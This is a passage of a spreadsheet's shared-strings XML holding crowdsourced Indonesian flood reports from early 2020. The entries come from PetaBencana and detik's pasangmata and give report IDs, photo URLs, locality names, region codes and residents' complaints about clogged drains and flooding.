    <t>yang ke dua kali kami kirim melalui aplikasi ini blm di tl tapi sdh selesai tlng di psng tutup saluran terimakasih</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349817</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/29/15829394451919077596.jpg</t>
  </si>
  <si>
    <t>Anak-anak Hingga Orang Dewasa Ikut Bersihkan Sisa Banjir</t>
  </si>
  <si>
    <t>Anak-anak asyik bermain air disela-sela masyarakat sedang melakukan pembersihan lumpur, Sabtu, (29/02/2020) pagi ini. Lumpur tersebut sisa-sisa banjir yang menerjang wilayah Cikeruh kemarin sore hingga malam tadi.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/p9-vFgWJW_0RbSEXKKnTYYZFDWRGiIjoQ_6ZjB0ARVAYDDbgBTRFyzbhL9Cp6La8dy-CR5vOsmTxYNlvrfAJlvySkT8B=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1858", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>saluran mampet dan dangkal gimana gak mau banjir</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349822</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/29/15829446381451007606.jpg</t>
  </si>
  <si>
    <t>Bhabinkamtibmas dan Masyarakat Bersihkan Lumpur Sisa Banjir</t>
  </si>
  <si>
    <t>Terlihat bersama masyarakat Babinsa, Bhabinkamtibmas Desa Cikeruh Polsek Jatinangor Polres Sumedang Polda Jabar, Serka Wawan Setiawan dan Aiptu Ayi Aan Bahtiar serta personil lainnya membantu masyarakat membersihkan sisa-sisa lumpur pasca banjir yang ber</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349826</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/29/158294713023386471.jpg</t>
  </si>
  <si>
    <t>Karang Taruna di Desa Cikeruh Bersihkan Lumpur Pasca Banjir</t>
  </si>
  <si>
    <t>Karangtaruna Sauyunan RW 09 Desa Cikeruh Kecamatan Jatinangor Sumedang ikut membantu warga membersihkan jalanan yang tertutup lumpur pasca banjir tadi malam, Sabtu, (29/02/2020) siang ini.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/f-QlUg-dy5QTsKrgx_sz1gYR-tS-p1O0NzywqDnX2VHtVJwKy4fQHLKkfE1TOipIM3cAskySalSS5vpgVU6hlFX-SmFSEA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "69", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>kpd yth dinas terkait mohon segera dibuatkan sanitasi/saluran air disamping pagar tembok SMPN 224 kamal kebon 200 krna klau hujan sebentar sudah mnjd genangan, trims</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349830</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/29/15829496061715583257.jpg</t>
  </si>
  <si>
    <t>Bupati Sumedang Pantau Langsung Desa Cikeruh Pasca Banjir</t>
  </si>
  <si>
    <t>Bupati Sumedang, H. Dony Ahmad Munir meninjau langsung keadaan masyarakat pasca banjir tadi malam ke wilayah Dusun Cikeruh, wilayah RW 09 Desa Cikeruh Kecamatan Jatinangor,Sumedang, Sabtu, (29/02/2020) siang ini.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/j8o2FTzNa81cGEJ-rZeInHbb9AFV4E-SkKzAJRIP3ozWZwD1XUqDeh_T8zNKOx9awCINuaTToWNO04_Jv8uerpyx_CHl=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1420", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap team penanggulangan banjir tolong pintu airnya dibuka, hujan baru setengah jam kalinya sudah meluap dampaknya rmh kami sdh terendam. mohon bantuannya bapak2 team penaggulangan banjir pintu airnya segera dibuka karena aliran kali tidak jalan s</t>
  </si>
  <si>
    <t>2e16d6a7-ccbd-45b0-90af-97e387a7bfca</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2e16d6a7-ccbd-45b0-90af-97e387a7bfca.jpg</t>
  </si>
  <si>
    <t>Jl. Dr. Setia budi perumahan pondok maharta kel. Pd. Kacang Timur kec. Pd. Aren Tangerang Selatan</t>
  </si>
  <si>
    <t>49fc15fb-1b75-465d-8eb5-53b9dc1be690</t>
  </si>
  <si>
    <t>https://images.petabencana.id/49fc15fb-1b75-465d-8eb5-53b9dc1be690.jpg</t>
  </si>
  <si>
    <t>Banjir sepaha orang dewasa di perum taman tridaya indah tambun selatan</t>
  </si>
  <si>
    <t>Tridayasakti</t>
  </si>
  <si>
    <t>0.0</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/O5jE1aOtyw_tyUl_6Uq4csJqCZ1pzG68OQ_KvWt_D0tdCOOLLUeEyrl0RkHFHYjFY_tyz7JzCdLMrY5oqk656rRIEsI=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "781", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>mohon diperbaiki tembok sisi saluran air rubuh ke got, dikhawatirkan banjir posisi perumahan griya inti sentosa blok H RT 09/RW 020, kelurahan sunter agung, kecamatan tanjung priok (depan taman) saluran dan jalan sudah milik DKI</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/voFAHwdz0ps4j0L8x-XJS02Ouz8VAE-KUopPOd8FoTYVMtvTv75DSGr-TjtRhzqoJeUFwn8QK-BGHOrWG3rDfn6SkMgUQQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2174", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKiriman sampai kapan tempat kami terendam banjir akibat kiriman air perumahan jgc  sebulan sudah 5x banjir tolong perhatiannya buat pemda setempat."</t>
  </si>
  <si>
    <t>0.2</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Y_D33i7lSmayDghz5ItHFx00lAcb-SvnMSvYSZycjSivu_PQ92yb4i6-fbDmUhW4WpddSUxoKAIirrMTgDngISLdjEuvig=s480-c</t>
  </si>
  <si>
    <t>smg boleh jd bhn evaluasi u pembenahan.Slm peduli</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/X7ahPdPqJ2CTWTagD5QcBcMuofijm5ptD1_SQxskUpNVjYLO9CRfTiZg_DpMbAwi0D9mG8aQxk22j2XOIl-bhmf88AgU=s480-c</t>
  </si>
  <si>
    <t>saluran gendong yg tidak berfungai</t>
  </si>
  <si>
    <t>0.6</t>
  </si>
  <si>
    <t>71a24527-f603-4ff3-8f32-43e31fe7c2d5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/71a24527-f603-4ff3-8f32-43e31fe7c2d5.jpg</t>
  </si>
  <si>
    <t>Banjir Wilayah Binong Permai Blok I Curug Tangerang 15810 ketinggian 100cm</t>
  </si>
  <si>
    <t>093659d7-121e-421c-9fa9-60befb1f31c6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/093659d7-121e-421c-9fa9-60befb1f31c6.jpg</t>
  </si>
  <si>
    <t>Banjir Wilayah Binong Permai Blok I Curug Tangerang 15810, ketinggian 1 Meter</t>
  </si>
  <si>
    <t>d008c9f4-eb19-4acb-b84d-315e5ddc981b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d008c9f4-eb19-4acb-b84d-315e5ddc981b.jpg</t>
  </si>
  <si>
    <t>Banjir Wilayah Binong Permai Blok I Curug Tangerang 15810, ketinggian 1 meter, RT.004/RW.014</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/76plku3Fn2gA2HNPNbTbArnJ08R9wjmi7j0tRfFJMhnPUNxXNvROhlLriDR8Hj9mWO7eYit34M0Lty2JWE6Z_6dmy1cl=s480-c</t>
  </si>
  <si>
    <t>gak tau lah mau bilang apa, pokok nya tindak lanjut yah… udah ke 6 kali itu meluap air depan rumah… Jalan Komplek Angkasa Pura Blok S8"</t>
  </si>
  <si>
    <t>a85af18e-dc35-4ae9-9a65-02e978f526be</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a85af18e-dc35-4ae9-9a65-02e978f526be.jpg</t>
  </si>
  <si>
    <t>Banjir terjadi sekitar jam 7 dan mulai meninggi sampai paha orang dewasa.</t>
  </si>
  <si>
    <t>Limo</t>
  </si>
  <si>
    <t>a1451b7e-00bb-4512-aa68-d932e8e63221</t>
  </si>
  <si>
    <t>Jepara cerah ceria. #siap untuk selamat"</t>
  </si>
  <si>
    <t>Panggang</t>
  </si>
  <si>
    <t>e2acd83e-a9b8-4941-b840-d2d55d33731a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e2acd83e-a9b8-4941-b840-d2d55d33731a.jpg</t>
  </si>
  <si>
    <t>Ujicoba peta bencana ..saat ini Jepara aman terkendali nihil banjir</t>
  </si>
  <si>
    <t>0.4</t>
  </si>
  <si>
    <t>ed8702fe-9039-4612-9795-b635060a891e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ed8702fe-9039-4612-9795-b635060a891e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "518", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Petojo Selatan</t>
  </si>
  <si>
    <t>0.5</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/LJWVdcBv-GDzzUjNJRdI8HocgN6VWR1A1TlZkm9pvANhq8YtsYsy6jz_6oX5eIBK71Np3qOYlMJvmK9fYZVA1LnPttytmg=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil  saluran mampet pasca banjir ke jalan? air"a</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ZWSxrT2ZYA_I27DaMulYJc4D_5lVBOJlr6aUw7Y3lUCAGTOApXBAM8_Qw7YNLv8ATU6JIK3I2-c6S3H19XdHiXdfG4jA=s480-c</t>
  </si>
  <si>
    <t>sampah sisa banjir</t>
  </si>
  <si>
    <t>dd1ffa0b-42a8-4d30-849b-fec341f3a3c8</t>
  </si>
  <si>
    <t>Jepara mandali, nihil banjir. Halo para relawan PB apa kabar kalian ? Salam dr saya Kak Totok SAR Jepara Jawa Tengah"</t>
  </si>
  <si>
    <t>0.9</t>
  </si>
  <si>
    <t>e52cb2f8-1f7d-46f2-bccb-2001cead12e2</t>
  </si>
  <si>
    <t>Ini foto</t>
  </si>
  <si>
    <t>Kebonsari</t>
  </si>
  <si>
    <t>Jember</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/LPndNy57CwDaUcMf0GqdJ5lCJdkcCetZS3aypbpUWJ18bD7O0jmAdQ9JJu6YI61_rebw1s71W3h-LE2IVmkyVuD3kR67uw=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2268", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Ada genangan di trotoar pejalan kaki depan hotel d"arcici sunter. kalo ada sumur serapan lebih bagus ini disini</t>
  </si>
  <si>
    <t>5157b559-ee3c-48fa-9b3a-669674315fb2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5157b559-ee3c-48fa-9b3a-669674315fb2.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-GO" }</t>
  </si>
  <si>
    <t>Gandasari</t>
  </si>
  <si>
    <t>Tolangohula</t>
  </si>
  <si>
    <t>Gorontalo</t>
  </si>
  <si>
    <t>4f7a3502-acd9-49aa-b608-0800ad82e5ce</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4f7a3502-acd9-49aa-b608-0800ad82e5ce.jpg</t>
  </si>
  <si>
    <t>banjir di kamdanen sariharjo ngaglik sleman yogyakarta</t>
  </si>
  <si>
    <t>Sari Harjo</t>
  </si>
  <si>
    <t>Ngaglik</t>
  </si>
  <si>
    <t>c122c045-ca33-4047-a9da-ce88293f5c4f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c122c045-ca33-4047-a9da-ce88293f5c4f.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-KS" }</t>
  </si>
  <si>
    <t>Kelayan Selatan</t>
  </si>
  <si>
    <t>Banjarmasin Selatan</t>
  </si>
  <si>
    <t>Banjarmasin</t>
  </si>
  <si>
    <t>Kalimantan Selatan</t>
  </si>
  <si>
    <t>0.1</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/1V2Kupo1wm8tytzAEECHqeic4Nkj0R-N6sqbGxo4KzpLpPqVZfYiFYhba9qbJREYaHMXB-qrxOtLWZjhxoFo6MDeHwo=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2485", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Saluran Air (Got) airnya tidak mengalir, tolong di TL. Lokasi RT.001 RW.010 BC. Terima kasih.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/GwPpNG0itO1pbkPkTW5fsh75QMYmp15qXRHcMTpAXm08yz4M_0sH8NavpVSfF7S-eHhyK3exogA_5e47pLJ9S645NbEP=s480-c</t>
  </si>
  <si>
    <t>tolong dikeruk endapan saluran air</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/7le3snXKNp5DxL2qxVTJfGfCQbCxzKiDCdF-zHis7swZTLpu8DZVg5gKRyiP8ANLi0XyDl7pl0HvMY_gEh2vezGpP28c=s480-c</t>
  </si>
  <si>
    <t>tolong dikeruk endapan saluran</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/EUqsVAKcHHzE5uRq9zQY7wgJb0lp6UnM7pQFLjwX0b6U1HUYo9PWzn2aHOa0m3lsEN4MbWQsk2HSXRGEhFEC78LgsHit=s480-c</t>
  </si>
  <si>
    <t>endapan saluran sudah penuh mohon dilakukan pengerukan</t>
  </si>
  <si>
    <t>3e531878-fbe7-41c4-904a-1f692d1ba9dc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3e531878-fbe7-41c4-904a-1f692d1ba9dc.jpg</t>
  </si>
  <si>
    <t>Genangan Air di depan Binus Square (Pintu Samping SMAN 78 JAKARTA)</t>
  </si>
  <si>
    <t>0.3</t>
  </si>
  <si>
    <t>ad8f579d-d582-4c7a-9ed3-071408dd09ae</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ad8f579d-d582-4c7a-9ed3-071408dd09ae.jpg</t>
  </si>
  <si>
    <t>Pekiringan</t>
  </si>
  <si>
    <t>Kesambi</t>
  </si>
  <si>
    <t>Cirebon</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/0Tm9TVNTt-wcgd0J0XGZmda8Hw_Jj8V5xyhmS_eFbM5W_5jWzYzpWptLtBF8OznOtZrCLPR1yrzS0o612GQ4EqtcdZNy=s480-c</t>
  </si>
  <si>
    <t>saluran got mampet jln jdi becek tolong dinas terkait  di tldi rt 07 rw 08 semanan sudah 3 hari air dari rumah warga</t>
  </si>
  <si>
    <t>1.0</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/cA-FqyTc9uqVeFWI9_TnDG514PlnSRDWMVWUhUBLHVPVUIwx2AdkwRIGzesyIEF0haUdL531rGQq0DKPcpAiI5h75FrE=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1428", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>saluran air mampet sudah hampir 5 hari</t>
  </si>
  <si>
    <t>5c049d08-0113-4495-ad44-d35ee736a1ff</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5c049d08-0113-4495-ad44-d35ee736a1ff.jpg</t>
  </si>
  <si>
    <t>Genangan air di Desa Mujur Kroya Cilacap</t>
  </si>
  <si>
    <t>Mujur Lor</t>
  </si>
  <si>
    <t>Kroya</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349998</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/03/05/349998-1583376363177596756.mp4-03.jpg</t>
  </si>
  <si>
    <t>Hujan Deras, Beberapa Wilayah Di Purworejo Terendam Banjir</t>
  </si>
  <si>
    <t>hujan yang mengguyur wilayah Purworejo sejak Rabu siang (4/3/2020) hingga Kamis pagi ini (5/3/2020) membuat beberapa daerah hilir di wilayah Purworejo tergenang Banjir luapan sungai bogowonto, salah satunya di daerah hilir desa Bagelen, di Balai desa Bag</t>
  </si>
  <si>
    <t>554d974b-c9a5-4293-b86e-efa2cd46b372</t>
  </si>
  <si>
    <t>https://images.petabencana.id/554d974b-c9a5-4293-b86e-efa2cd46b372.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3762", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>UwU</t>
  </si>
  <si>
    <t>Mangkang Wetan</t>
  </si>
  <si>
    <t>Tugu</t>
  </si>
  <si>
    <t>59567c70-2a14-4151-bfae-a0e06fcf3db3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/59567c70-2a14-4151-bfae-a0e06fcf3db3.jpg</t>
  </si>
  <si>
    <t>Di ITS, banjir masuk ke rumah warga setinggi mata kaki</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/350123</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/03/08/15836730881626748881.jpg</t>
  </si>
  <si>
    <t>Desa Margamulya Alami Banjir Akibat Gorong-gorong yang Kecil</t>
  </si>
  <si>
    <t>Banjir terjadi di Jalan Kawali-Panjalu, Dusun Sukajaya,Desa Margamulya, Kec.Kawali, Ciamis, Minggu, (08/03/2020) malam ini. Banjir terjadi karena volume air yang besar tetapi gorong-gorong hanya berdiameter 50cm.</t>
  </si>
  <si>
    <t>Kertasari</t>
  </si>
  <si>
    <t>Ciamis</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/CTTMAjPReydDgVZHgeV-25ovcPaMLN-PqXOBd7mMoGqgM7cYX6sj7cUd_IfKWp9roSQBcwB3wup9yi2gKsF73cSW7ISq=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "553", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Got Banyak Sampah dan Lumpur yang menumpuk, potensi banyak jentik nyamuk, pemilik rumah atau yang tinggal disitu tidak kooperatif untuk membersihkan, dan Pak RT pun tidak menegurnya,</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/9W99kVKZKXvJjhmF-CbC5z0JfyhOZLedFp8tPeQ50roANGdPKhTZ0gdwGgZ0BexIyYSxadDvzv-AII_XU64oyT5YG1Tl=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2606", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>kalau memungkinkan buat daerah resapan</t>
  </si>
  <si>
    <t>cda9af82-2eb3-477f-a56f-55d85e0b1fa2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cda9af82-2eb3-477f-a56f-55d85e0b1fa2.jpg</t>
  </si>
  <si>
    <t>Lapor Banjir #UjiCobPetaBencana</t>
  </si>
  <si>
    <t>1104b0b6-6197-4c8f-bd6b-61ba5585fa33</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1104b0b6-6197-4c8f-bd6b-61ba5585fa33.jpg</t>
  </si>
  <si>
    <t>bencana banjir di kecamatan Boliyohuto, kecamatan Tibawa dan kecamatan mootilango.</t>
  </si>
  <si>
    <t>Puncak</t>
  </si>
  <si>
    <t>Pulubala</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/3s-EE_9jQ8XJwKnVVea4z3opszu6sm6EeY7-RHdViE3JPJcRlWA7E20oDXX3VDVhrZkiyefY2ci50FIQs1v_rpQiz2l-tw=s480-c</t>
  </si>
  <si>
    <t>sampai kapan kondisi seperti ini akan hilang dilingkungan kami...  mohon untuk dinas terkait solusi kongkrit menanggulangi masalah ini.. sudah sering kami laporan keRT,RW,Lurah, dll.. kondisinnya sama setiap hujan terdapat genangan dan tak kunjung surut.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/9TtUbV09D1Wk_zDxUGZO114gixlne2FBMVkYOkKFvVBXYgIlV2wQK_ijP1mbVPBJl5KTRRQ6s5fnq3if2EjYNrK7tl4V=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1397", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil banjir didpn RSUD TEBET tdk ad petugas yg bertindak</t>
  </si>
  <si>
    <t>Tebet Barat</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/1-dqZFIzzbm8vO2juJpU30rFwQC_TxfPTKwRihyYEOnNnxMaNBel5jQna7sF3yoFpBzWIDmyZVUvvVR9Y_5HcGbC5ZhBZA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1198", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>sampai kapan lagi warga harus menderita karna belum dibenerinnya tanggul pembatas PM dan warga? kerugian masyarakat udah terlalu banyak bapak ibu lurah pasar manggia dan camat setiabudi, kami capek minggu harus kayak gini! ini kali ke 5 kami kebanjiran d</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/350353</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/03/15/15842828771816154651.jpg</t>
  </si>
  <si>
    <t>Air Sungai Cikeruh Kembali Meluap Malam Ini Malam ini air Sungai Cikeruh di Desa Cikeruh, Kecamatan Jatinangor, Sumedang, kembali meluap, Minggu (15/3/2020). Jalan Cikeruh wilayah RT 03/09 sudah mulai tergenang. Babinsa Desa Cikeruh Koramil Jatinangor Serka Wawan beserta aparatur desa ketua RW"</t>
  </si>
  <si>
    <t>Cijeungjing</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/350354</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/03/15/1584284382177998090.jpg</t>
  </si>
  <si>
    <t>Sebuah Rumah Warga Terendam Luapan Sungai Cikeruh Sebuah rumah milik sdr Eman/Iis sudah mulai tergenang air Sungai Cikeruh, Minggu (15/03/2020) malam ini. Rumah tersebut berada lebih rendah dari pada jalan umum."</t>
  </si>
  <si>
    <t>ed5fca67-b806-4054-a38a-3883b4fe5d25</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ed5fca67-b806-4054-a38a-3883b4fe5d25.jpg</t>
  </si>
  <si>
    <t>Ujan sekitar jam 16:00, jam 17:00 udah segitu banjirnya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/PiJgGpZqtZkWxu6NTDu89ZtlXKBxlHFoHxLV0XpaqybUHzbOWfL37AXwjg74jqq14rYl5Hq3llH6WCl6Rd_zW75K_7-8wg=s480-c</t>
  </si>
  <si>
    <t>saluran air tersumbat</t>
  </si>
  <si>
    <t>4bee2378-b9f2-48d8-a23a-f9b175b96acf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4bee2378-b9f2-48d8-a23a-f9b175b96acf.jpg</t>
  </si>
  <si>
    <t>Banjir malam ini.sejak sore meluap.kondisi sekarang masih hujan.tolong tindaklanjut</t>
  </si>
  <si>
    <t>d755ef24-c72b-4a03-b8e4-e82c2cd13f3c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1890", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir, dan masih naek terus</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/TDNc_qp3M8atg9MdmRz1ktUUKH7ZyAonMLtZYugwvAutpvPpMsaIrDJDZBxfFpULRmkYtAlfagQhvXZxicfebPIO615X=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "947", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>gang Setiabudi , banjir lagi</t>
  </si>
  <si>
    <t>Srengseng Sawah</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/RyR7_bvOgFG_86XyON8zcWHITsOYFEwOJuwKebKsyKJHP5Zae5i9oFXuryT0aSz7YtljrA_qSqR_nIFA6LtzdPHwmmI=s480-c</t>
  </si>
  <si>
    <t>banjir , gang Setiabudi   RT 0011.  RW 08 Jagakarsa , serengsen  sawah</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/I0TAkxDO_beL8-Y6a9Eb06nBHaUY8ZJXhOcPz_1ukDOe9AZK0JD-R9vkXMJ7H2cGWd7Pxn5UArcq_4jg1mAYGduRG1QudQ=s480-c</t>
  </si>
  <si>
    <t>Warga RT01 &amp; 02 RW04 Kel Cipinang Melayu Kec Makasar JakTim Kebanjiran. Ketinggian air saat ini sepaha orang dewasa. Mohon bantuan instansi bersangkutan agar air cepat surut. Terima kasih#KaliMeluap #BanjirBandang #BanjirKiriman #</t>
  </si>
  <si>
    <t>d89b6227-8936-4a2c-8638-498a4c626416</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d89b6227-8936-4a2c-8638-498a4c626416.jpg</t>
  </si>
  <si>
    <t>Banjir mulai meninggi di jalan Tipala, kp makasar, jaktim.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/OKCD8Y4LzPQ9Z5FhtfZiOlhyJ80xuJWVY3ZT0blpjaPvCbiINw-F7h4cV2fcwgzjTTa0glYhJLjdYSjdARQV858F_mSt=s480-c</t>
  </si>
  <si>
    <t>Di RT 13 RW 10 Kebon Pala, gak hujan tetep banjir dapat kiriman, apalagi hujan deras....help...Pemkot DKI...masalah banjir tidak pernah selesai di kampung kami \u1f614</t>
  </si>
  <si>
    <t>0.7</t>
  </si>
  <si>
    <t>6c3aa788-ed24-458d-a481-c4eefbb2247a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6c3aa788-ed24-458d-a481-c4eefbb2247a.jpg</t>
  </si>
  <si>
    <t>21.30/22.00 WIB DAERAH VILLA NUSA INDAH, BOJONGKULUR, GUNUNGPUTRI, BOGOR</t>
  </si>
  <si>
    <t>12ddfa0a-83ee-4e22-9711-7868d4549e7d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/12ddfa0a-83ee-4e22-9711-7868d4549e7d.jpg</t>
  </si>
  <si>
    <t>lokasi kampung baru 1 halim PK</t>
  </si>
  <si>
    <t>3d862556-87e2-498f-8807-a93dd57e65e1</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 149 }</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-SN" }</t>
  </si>
  <si>
    <t>Daya</t>
  </si>
  <si>
    <t>Biring Kanaya</t>
  </si>
  <si>
    <t>Makassar</t>
  </si>
  <si>
    <t>Sulawesi Selatan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/xkI3ck-mZo02gtuBW4WTdVjFbd-Mz5XohNT53NDPloJWqt1eUnVyQdw0k-XHbp8i_0_0f61Y3FC0xNCLMVi97IEBC4ZH=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1392", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>got mampet banyak sampah</t>
  </si>
  <si>
    <t>83588b7c-b80f-4067-82a8-e59500fafc75</t>
  </si>
  <si>
    <t>Tengger Kandangan 5, Kel. Kandangan, Kec. Benowo</t>
  </si>
  <si>
    <t>ca40e4e1-85c4-436d-a96c-fcd6f2143253</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ca40e4e1-85c4-436d-a96c-fcd6f2143253.jpg</t>
  </si>
  <si>
    <t>5feae121-c960-4b6d-a8d6-767f9a776af1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5feae121-c960-4b6d-a8d6-767f9a776af1.jpg</t>
  </si>
  <si>
    <t>Banjir mulai naik dari luapan kali angke pukul 3 dini hari tadi</t>
  </si>
  <si>
    <t>Duren Mekar</t>
  </si>
  <si>
    <t>Bojongsari</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/350419</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/03/18/15844929441164560817.jpg</t>
  </si>
  <si>
    <t>Genangan Air Merendam Jalan Kincan Pondok Gede</t>
  </si>
  <si>
    <t>Hingga pagi ini tanggal 18 Maret 2020, Jalan Kincan Pondok Gede masih trergenang air.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/lUDoP5LMq8d6LJNJe5HElBnqi18aVNSPP9vbwFV53Duea23ov938apivWdDErHnXgI_rKKTWG6hQa-lyCESbhiSYswu3=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2627", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>423190c2-2a3c-48f9-a496-3536da720a6d</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "646", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Gondangdia</t>
  </si>
  <si>
    <t>f429dc67-e74b-4bb6-b3f4-4bbacc256c62</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f429dc67-e74b-4bb6-b3f4-4bbacc256c62.jpg</t>
  </si>
  <si>
    <t>Banjir daerah kabupaten bekasi, cikarang utara, di perumahan cikarang baru</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/wYYCnPqtIZ_ecS_s9dlKHa3fHURhKrUY3n815wLXXjR9lq2tP_FkEsO4wHty74x-Vv2tymjwPGyJ6TIL_JPnbIbfKaY=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil #KaliMeluap</t>
  </si>
  <si>
